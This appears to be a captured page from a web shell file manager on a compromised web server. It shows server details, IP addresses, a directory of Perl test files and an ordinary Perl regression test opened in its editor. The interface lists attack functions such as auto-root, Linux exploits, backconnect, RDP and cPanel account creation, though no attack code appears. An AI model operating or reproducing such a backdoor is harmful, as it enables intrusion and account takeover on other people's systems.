Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Test-Simple /
t /
regression /
[ HOME SHELL ]
Name
Size
Permission
Action
642_persistent_end.t
445
B
-rw-r--r--
662-tbt-no-plan.t
564
B
-rw-r--r--
684-nested_todo_diag.t
520
B
-rw-r--r--
694_note_diag_return_values.t
401
B
-rw-r--r--
696-intercept_skip_all.t
1005
B
-rw-r--r--
721-nested-streamed-subtest.t
2.89
KB
-rw-r--r--
757-reset_in_subtest.t
289
B
-rw-r--r--
buffered_subtest_plan_buffered...
624
B
-rw-r--r--
builder_does_not_init.t
362
B
-rw-r--r--
errors_facet.t
985
B
-rw-r--r--
inherit_trace.t
548
B
-rw-r--r--
no_name_in_subtest.t
135
B
-rw-r--r--
todo_and_facets.t
906
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : todo_and_facets.t
use strict; use warnings; use Test2::API qw/context/; use Test2::Tools::Tiny qw/done_testing todo/; use Test::More(); BEGIN { *tm_ok = \&Test::More::ok; *tm_pass = \&Test::More::pass; *tm_fail = \&Test::More::fail; } use vars qw/$TODO/; sub leg_ok($;$@) { my ($bool, $name, @diag); my $ctx = context(); $ctx->ok($bool, $name, \@diag); $ctx->release; return $bool; } sub new_ok($;$@) { my ($bool, $name, @diag) = @_; my $ctx = context(); return $ctx->pass_and_release($name) if $bool; return $ctx->fail_and_release($name, @diag); } { local $TODO = "Testing TODO"; tm_ok(0, "tm_ok fail"); tm_fail('tm_fail'); leg_ok(0, "legacy ok fail"); new_ok(0, "new ok fail"); } todo new_todo_test => sub { tm_ok(0, "tm_ok fail"); tm_fail('tm_fail'); leg_ok(0, "legacy ok fail"); new_ok(0, "new ok fail"); }; done_testing;
Close